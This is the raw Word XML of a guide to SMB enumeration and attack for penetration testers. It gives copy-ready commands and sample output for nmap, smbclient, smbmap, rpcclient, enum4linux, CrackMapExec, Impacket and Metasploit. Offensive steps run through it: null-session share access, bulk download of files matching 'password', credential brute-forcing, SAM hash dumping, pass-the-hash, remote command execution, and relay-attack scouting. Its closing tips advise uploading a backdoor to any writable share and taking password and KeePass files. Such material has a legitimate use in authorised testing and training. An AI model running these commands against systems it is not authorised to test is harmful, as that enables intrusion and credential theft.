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337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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A77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SMB Enumeration Guide — Simple English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complete SMB enumeration guide with all commands, sample outputs, and simple explanations. You can copy any command directly.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Port Scan (Find SMB First)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enumeration, scan to see if port 139 or 445 is open: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-p 139,445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PORT    STATE SERVICE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139/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open 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netbios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-ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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445/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open 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microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-ds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 Port 139 = NetBIOS Session, Port 445 = SMB directly. At least one must be open.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NetBIOS Name Enumeration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nmblookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Get the NetBIOS name and services of a machine.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nmblookup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-A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Looking up status of 192.168.1.100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SERVER01        &lt;00&gt; -  B &lt;ACTIVE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&gt;  (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Workstation Service)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WORKGROUP       &lt;00&gt; -  B &lt;ACTIVE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&gt;  (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Workgroup/Domain)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SERVER01        &lt;20&gt; -  B &lt;ACTIVE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&gt;  (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File Server Service)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:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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&lt;00&gt;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Computer name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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&lt;20&gt;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File sharing is running (SMB server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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WORKGROUP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Workgroup or Domain name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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Scan entire subnet for SMB hosts.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nbtscan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192.168.1.0/24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192.168.1.100    SERVER01&lt;00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&gt;  WORKGROUP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&lt;00&gt;  SERVER01&lt;20&gt;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192.168.1.101    DC01&lt;00&gt;      DOMAIN&lt;00&gt;     DOMAIN&lt;1c&gt;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smbclient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List &amp; Access Shares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List shares with null session (no password):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smbclient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-L //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-N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smbclient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-L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 ""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Sharename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Type      Comment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---------       ----      -------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ADMIN$          Disk      Remote Admin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C$              Disk      Default share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IPC$            IPC       Remote IPC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SharedDocs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Disk      Company Documents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NETLOGON        Disk      Logon server share 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SYSVOL          Disk      Logon server share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:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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end = Hidden administrative share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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IPC$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Used for RPC communication (very important)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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SharedDocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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Normal share, main target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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NETLOGON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SYSVOL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Domain controller shares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 to a specific share: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smbclient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//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SharedDocs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-N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Try "help" to get a list of possible commands.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: \&gt;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Once inside, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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list files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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change directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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get &lt;file&gt;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download a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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put &lt;file&gt;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upload a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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prompt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toggle interactive mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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recurse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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toggle recursive (for folders)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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mget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download all files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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quit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List shares with username and password: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smbclient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-L //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 domain/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username%password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 with credentials: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smbclient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//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ShareName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-U username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smbmap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Share Enumeration with Permissions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Null session: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-H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[+] IP: 192.168.1.100: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445  Name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192.168.1.100             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 xml:space="preserve">Disk                                                 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Permissions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Comment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 xml:space="preserve">----                                                 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-----------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-------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 xml:space="preserve">ADMIN$                                            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NO ACCESS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Remote Admin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 xml:space="preserve">C$                                                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NO ACCESS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Default share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 xml:space="preserve">IPC$                                             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READ ONLY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Remote IPC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SharedDocs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READ ONLY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Company Documents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 xml:space="preserve">NETLOGON                                          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READ ONLY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Logon server share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 xml:space="preserve">SYSVOL                                            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READ ONLY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Logon server share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Explanation: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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permissions clearly —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READ ONLY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READ/WRITE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NO ACCESS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List files inside a share (recursive):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-R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SharedDocs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-H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[+] Recursively listing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SharedDocs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[+] IP: 192.168.1.100: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445  Name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: 192.168.1.100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SharedDocs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READ ONLY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SharedDocs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\Reports\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READ ONLY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.\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SharedDocs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\Reports\Q1.xlsx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READ ONLY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.\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SharedDocs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\password.txt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ab/>
        <w:t>READ ONLY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credentials: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-H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 username -p password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domain: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-H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 username -p password -d DOMAIN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Download everything from a share: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-R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SharedDocs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-H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-A password -q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-A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pattern to search/download,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-q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quiet mode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proofErr w:type="spellStart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Nmap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NSE Scripts for SMB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Scan all SMB scripts at once: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-p445 --script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r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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Enumerate shares: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--script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enum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-shares -p 139,445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Host script results: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-shares: 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account_used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: &lt;blank&gt;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\\192.168.1.100\ADMIN$: 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 Type: STYPE_DISKTREE_HIDDEN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 Comment: Remote Admin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 Anonymous access: &lt;disabled&gt;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|   \\192.168.1.100\IPC$: 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 Type: STYPE_IPC_HIDDEN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 Anonymous access: &lt;disabled&gt;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\\192.168.1.100\SharedDocs: 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 Type: STYPE_DISKTREE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 Anonymous access: READ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Detect OS version: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--script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os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-discovery -p 445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Host script results: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-discovery: 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OS: Windows Server 2022 Standard 20348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OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cpe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:/o:microsoft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:windows_server_2022::-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Computer name: DC01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NetBIOS computer name: DC01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Domain: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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example.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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FQDN: 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DC01.example.local</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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_  System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time: 2026-08-25T10:30:00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Enumerate users (need credentials):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--script=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enum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-users -p 445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--script-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args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smbuser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=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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admin,smbpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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=pass123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-users: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WORKGROUP\Administrator (RID: 500)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WORKGROUP\Guest (RID: 501)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WORKGROUP\john (RID: 1001)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WORKGROUP\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msfadmin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(RID: 1002)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for vulnerabilities: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sudo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nmap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--script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smb-vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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-p 139,445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smb-vuln-ms17-010: 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VULNERABLE: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Remote Code Execution vulnerability in Microsoft SMBv1 (MS17-010)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 State: VULNERABLE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  IDs:  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CVE:CVE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-2017-0143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 Risk factor: HIGH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smb-vuln-cve-2017-7494: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VULNERABLE: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Linux Samba remote code execution (CVE-2017-7494)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Check SMB protocols supported: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--script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-protocols -p 445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 one-line scan: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-p445 --script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smb-enum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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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,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gram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-vuln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r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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,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os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discovery,smb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-protocols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Full service scan with default scripts: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sV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sC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-p 139,445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proofErr w:type="spellStart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rpcclient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RPC Command Execution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 with null session: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rpcclient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-U "" -N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successful, you get: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rpcclient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Important </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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rpcclient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commands to run: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267"/>
        <w:gridCol w:w="4156"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidTr="00A77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 Output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srvinfo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info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SERVER01 </w:t>
            </w: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Wk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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Sv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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PrQ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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Unx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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NT SNT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netshareenum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shares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netname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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: </w:t>
            </w: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SharedDocs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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netshareenumall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shares (hidden too)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netname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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ADMIN$, type: 0x80000000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enumdomusers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domain users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user:[administrator] rid:[0x1f4]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enumdomgroups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domain groups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group:[Domain Admins] rid:[0x200]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enumalsgroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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builtin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List </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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builtin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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groups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group:[Administrators] rid:[0x220]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lookupsids</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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&lt;RID&gt;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username by RID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S-1-5-21-... *DOMAIN\username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queryuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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&lt;RID&gt;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details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 Name : Administrator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getdompwinfo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min_password_length</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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7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querydominfo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info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Domain: EXAMPLE, Server: DC01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enumpriv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privileges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lsaenumsid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LSA SIDs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 commands without interactive mode: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rpcclient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-U "" -N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-c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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srvinfo;netshareenumall</w:t>
      </w:r>
      <w:proofErr w:type="gram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;enumdomusers;getdompwinfo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"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enum4linux — The All-in-One Tool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 scan (null session):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enum4linux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-a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Specific scans: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enum4linux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-U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   </w:t>
      </w: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Users only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enum4linux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-S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   </w:t>
      </w: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Shares only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enum4linux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-P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   </w:t>
      </w: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Password policy only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enum4linux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-G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   </w:t>
      </w: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Groups only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enum4linux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-n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   </w:t>
      </w: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NetBIOS names only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enum4linux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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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   </w:t>
      </w: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RPC info only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credentials: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enum4linux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-u username -p password -a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enum4linux shows you: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Target Information                   |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Target ........... 192.168.1.100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RID Range ........ 500-550, 1000-1050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Username ......... '' (null session)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OS Information                       |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[+] OS: Windows 10/Server 2019 Build 17763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[+] OS from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srvinfo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: WORKGROUP\\SERVER01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Users via RID cycling                |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S-1-5-21-123456789-...-500 *SAM\Administrator (Local User)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S-1-5-21-123456789-...-501 *SAM\Guest (Local User)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S-1-22-1-1000 *Unix User\user (Local User)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Share Enumeration                    |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Sharename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Type    Comment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---------       ----    -------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SharedDocs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Disk    Company Documents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IPC$            IPC     Remote IPC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===========================================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|    Password Policy                      |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===========================================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Password min length: 7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Password history: 24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Lockout threshold: 5 attempts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Lockout duration: 30 minutes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enum4linux-ng (New Version — Supports SMB2/SMB3)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sudo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apt install enum4linux-ng -y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Or from source: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git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clone https://github.com/cddmp/enum4linux-ng.git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cd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enum4linux-ng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pip3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install -r requirements.txt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Full scan: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enum4linux-ng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-A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credentials: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enum4linux-ng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-u username -p password -A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Save output in JSON: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enum4linux-ng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-A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oJ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proofErr w:type="gram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output.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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CrackMapExec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(CME) — Modern Powerful Tool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Null session — list shares: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crackmapexec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 '' -p '' --shares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SMB         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192.168.1.100  445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SERVER01   [*] Windows 10 Build 17763 x64 (name:SERVER01) (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domain:WORKGROUP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SMB         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192.168.1.100  445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SERVER01   [+] WORKGROUP\: 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SMB         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192.168.1.100  445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SERVER01   [+] Enumerated shares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SMB         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192.168.1.100  445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SERVER01   Share           Permissions     Remark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SMB         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192.168.1.100  445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SERVER01   -----           -----------     ------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SMB         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192.168.1.100  445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SERVER01  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SharedDocs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READ            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SMB         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192.168.1.100  445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SERVER01   IPC$                             Remote IPC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Enumerate users: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crackmapexec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 '' -p '' --users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SMB signing (for relay attacks):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crackmapexec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 '' -p ''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| </w:t>
      </w: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grep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i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signing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SMB         </w:t>
      </w:r>
      <w:proofErr w:type="gram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192.168.1.100  445</w:t>
      </w:r>
      <w:proofErr w:type="gram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SERVER01   [+] Signing: False (vulnerable to relay!)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Brute-force users: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crackmapexec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 users.txt -p passwords.txt --continue-on-success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Spider Plus — search files in shares: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crackmapexec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-u username -p password -M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spider_plus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-o EXCLUDE_DIR=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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Windows,ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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finds files like passwords, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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files, etc.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Dump SAM hashes (need admin credentials):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crackmapexec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 admin -p password --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sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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List local group members: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crackmapexec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 admin -p password --local-groups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Execute command remotely (admin required):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crackmapexec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-u admin -p password -x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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Pass-the-Hash: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crackmapexec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 administrator -H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NTLM_HAS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H&gt;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--shares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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Impacket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Tools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samrdump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Dump users via SAMR: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samrdump.py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 Connects to SAMR (Security Account Manager Remote) and lists all users, groups, and RIDs.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lookupsid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Find users by brute-forcing RIDs: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lookupsid.py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anonymous@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Output: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192.168.1.100 - S-1-5-21-123456789-...-500 (*RESOLVED: WORKGROUP\Administrator)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192.168.1.100 - S-1-5-21-123456789-...-501 (*RESOLVED: WORKGROUP\Guest)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192.168.1.100 - S-1-5-21-123456789-...-1001 (*RESOLVED: WORKGROUP\john)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192.168.1.100 - S-1-5-21-123456789-...-1002 (*RESOLVED: WORKGROUP\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msfadmin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smbexec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Run commands via SMB (admin needed):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smbexec.py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domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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user:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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@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psexec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Like Microsoft's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PsExec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psexec.py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domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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user:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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@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smbclient.py — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Impacket's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SMB client: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smbclient.py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domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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user:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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@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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Metasploit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Framework Modules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SMB Share Enumeration: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msf6 &gt; use auxiliary/scanner/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smb_enumshares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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msf6 auxiliary(scanner/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smb_enumshares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&gt; set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rhosts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&lt;TARGET_IP&gt;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msf6 auxiliary(scanner/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smb_enumshares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&gt; set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smbuser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username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msf6 auxiliary(scanner/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smb_enumshares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&gt; set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smbpass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password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msf6 auxiliary(scanner/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smb_enumshares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) &gt; run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Enumeration via SID Lookup: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msf6 &gt; use auxiliary/scanner/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smb_lookupsid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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msf6 auxiliary(scanner/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smb_lookupsid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&gt; set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rhosts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&lt;TARGET_IP&gt;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msf6 auxiliary(scanner/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smb_lookupsid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) &gt; run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MS17-010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Vulnerability Check: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msf6 &gt; use auxiliary/scanner/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/smb_ms17_010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msf6 auxiliary(scanner/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/smb_ms17_010) &gt; set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rhosts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&lt;TARGET_IP&gt;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msf6 auxiliary(scanner/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/smb_ms17_010) &gt; run</w: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SMB Version Detection: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msf6 &gt; use auxiliary/scanner/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smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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msf6 auxiliary(scanner/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smb_version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&gt; set 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rhosts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&lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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msf6 auxiliary(scanner/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smb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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) &gt; run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Mount SMB Share on Linux (Manual Access)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sudo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mount -t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cifs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//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SharedDocs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/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mnt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-o username=guest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Or with credentials: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sudo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mount -t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cifs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//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SharedDocs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/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mnt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-o username=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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john,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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=pass123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browse like normal files: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ls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/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mnt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cat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/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mnt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/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/password.txt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One-Line Complete SMB Enumeration Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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these in order for a full picture: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Step 1: NetBIOS info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nmblookup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-A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nbtscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"># Step 2: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> scan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nmap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sV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sC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-p 139,445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lastRenderedPageBreak/>
        <w:t>nmap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--script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smb-enum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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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,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gram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-vuln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r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="ACAFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>*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,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os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-discovery -p 445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 xml:space="preserve"># Step 3: List shares via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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smbclient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-L //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-N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 xml:space="preserve"># Step 4: Share permissions via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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smbmap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-H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Step 5: RPC enumeration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rpcclient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-U "" -N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-c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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netshareenumall;enumdomusers</w:t>
      </w:r>
      <w:proofErr w:type="gram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;srvinfo;getdompwinfo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"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# Step 6: All-in-one enum4linux-ng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enum4linux-ng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-A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 xml:space="preserve"># Step 7: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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crackmapexec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 '' -p '' --shares --users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 xml:space="preserve"># Step 8: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="EEF0F9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tools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samrdump.py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lookupsid.py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anonymous@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>P&gt;</w:t>
      </w:r>
    </w:p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Summary Table —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327"/>
        <w:gridCol w:w="1428"/>
        <w:gridCol w:w="2788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidTr="00A77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Null Session?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 scan + scripts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Ports, OS, shares, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vulns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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nmblookup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NetBIOS name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name, workgroup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nbtscan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SMB hosts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SMB hosts in subnet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smbclient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List/access shares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names, files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smbmap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 + permissions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Permissions (R/W/NO)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rpcclient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RPC commands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Users, groups, policy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enum4linux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enumeration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Everything at once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enum4linux-ng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enumeration (new)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Everything + SMB2/3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crackmapexec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multi-purpose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Shares, users, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vulns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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hashes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samrdump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dump via SAMR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users + RIDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidTr="00A77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lookupsid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SID brute force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77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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7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Username from RID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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7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Pro Tips (Keep These in Mind)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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Null session first. Always check if anonymous access works — it gives the most info with zero effort.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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Port 445 vs 139. Port 445 is modern SMB. Port 139 is older NetBIOS. Check both.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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SMB signing check. If signing is disabled, you can do NTLM relay attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A7733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A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77337">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1719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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00DAEF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 &lt;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TARGET_I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EEF0F9"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">P&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00A77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFD493"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-u '' -p ''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A773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Look for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Signing: False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output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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IPC$ is always open. This share is used for RPC and null session validation. If IPC$ is accessible, many RPC calls will work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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Re-scan after getting credentials. Many things that are hidden without a password become visible once you have valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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SMB1 is dangerous. If SMBv1 is enabled, check for MS17-010 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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>) immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A77337" w:rsidRPr="00A77337" w:rsidRDefault="00A77337" w:rsidP="00A77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everything. If you find a share with write access, upload a backdoor. If read access, download all files — especially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.txt</w:t>
      </w:r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xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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docx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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.xml</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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kdbx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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77337">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>pst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A77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files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F5606" w:rsidRDefault="00A77337"/>
    <w:sectPr w:rsidR="004F5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14267"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="614E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C4E99"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECC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54A5A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C66B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D3744"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C2C4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337"/>
    <w:rsid w:val="008A2028"/>
    <w:rsid w:val="00A2693B"/>
    <w:rsid w:val="00A7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6FED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{06EFA20A-A926-4446-892F-C5199661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73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73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73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3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73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73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7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A77337"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-xs">
    <w:name w:val="text-xs"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A7733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73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73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7337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A77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9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5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96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8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6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9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7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3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3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1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3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2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6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7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6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7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2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8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1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9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6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6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2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7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9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3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3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1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5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5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0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8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4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8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1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5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1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2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0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4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8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0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1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4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5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5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0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2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2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4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5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1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9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0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7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6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2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7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4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4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63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4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7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1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2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9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9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5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2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6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5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3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5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7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2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8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1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4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6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7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4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9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6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7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8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8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2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3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9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8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4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0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6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2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2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2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5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0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5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0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8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2250</Words>
  <Characters>12826</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>106</Lines>
  <Paragraphs>30</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15046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bwu</dc:creator>
  <cp:keywords/>
  <dc:description/>
